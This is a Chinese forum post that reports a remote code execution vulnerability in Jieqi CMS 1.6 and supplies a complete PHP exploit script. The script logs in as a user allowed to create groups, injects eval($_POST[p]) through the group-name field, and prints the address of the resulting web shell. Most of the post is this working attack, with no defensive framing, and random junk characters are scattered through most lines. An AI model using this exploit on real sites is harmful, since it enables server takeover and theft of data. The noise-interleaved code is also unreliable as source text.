杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
9 A* b/ p$ F# l2 c
" u( Z6 x& z" x7 Y+ U . c. Z# B+ O; P/ e. n
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。( Z# h- j4 L( c& ?
需要有一个能创建圈子的用户。
* m4 x0 H2 T) @3 ]
i7 m3 K5 ^( g<?php
/ R) q5 x H! ?0 K1 o# I o ' F5 x" q% _. ~2 w" z
print_r('
* U0 W! Q# c/ o9 E' S" P' U+ ]+---------------------------------------------------------------------------+5 m- V: e g+ Z3 v! P6 c
Jieqi CMS V1.6 PHP Code Injection Exploit1 }6 Z0 u1 |+ K
by flyh4t2 { }9 I+ D9 g9 {- z3 F! ]6 H
mail: phpsec at hotmail dot com
( Z- H# D2 U$ W, Rteam: http://www.wolvez.org
( W+ n/ h0 `, m# s! w) A, Y0 I& I+---------------------------------------------------------------------------+
# V. V, r0 N8 T* Z: R9 m'); /**0 c+ R7 c, z2 v9 x- P
* works regardless of php.ini settings
* v I5 c' q; K7 e*/ if ($argc < 5) { print_r('9 M P; z/ E+ b5 g. B `- P
+---------------------------------------------------------------------------+
0 ~: p" C4 ^) }Usage: php '.$argv[0].' host path username7 W' X# K0 `5 T6 e) P
host: target server (ip/hostname)) {# N; N6 ~( t- s5 p
path: path to jieqicms
$ p! X W% `* @* \ K! K" Puasename: a username who can create group8 ?2 W* p! I3 n. g- }0 S
Example:
( A0 U" Q* ?6 ~' n1 }, O+ Lphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
& X2 e4 @7 D7 }+---------------------------------------------------------------------------+( v" Y' o5 _$ a! x, F
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
$ b7 |- E& o5 o- O, ^3 T% \: d" WContent-Disposition: form-data; name="gname"
; n4 | f/ n' K& S( x5 S
4 H, K( q9 }* }'; $params .="';"; $params .='eval($_POST[p]);//flyh4t$ p" ^/ G2 g. ^5 E/ ~* z5 a( Y
-----------------------------23281168279961
# V/ Z; J$ ]! K. p9 ?( j% D/ GContent-Disposition: form-data; name="gcatid"
1 O. n4 z% ?9 w6 ~3 A, Q3 J ( I: d/ n7 }. r$ \7 i6 _* F
11 x% \& g7 f8 W0 T5 ] ^
-----------------------------23281168279961
4 L2 k; J( ?$ N' l5 yContent-Disposition: form-data; name="gaudit"
1 n/ g7 {9 l5 \- O$ X5 X) Z i
% B$ l, T: s! g' B; p1
* K: g: _2 p+ @-----------------------------23281168279961* M: y9 }) j' p5 M9 D! c
Content-Disposition: form-data; name="gbrief"% u$ w* _& r3 a+ h5 @: S& b
8 x+ z% f6 W- Q& f8 O3 J
1 Q) Z) Y& s- t! V+ r0 C1 L+ v
-----------------------------23281168279961--
' ?& ~9 i$ c; _5 x3 ~4 o( J'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
/ L7 L) H: F# c & g' L/ J. M: I0 j
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对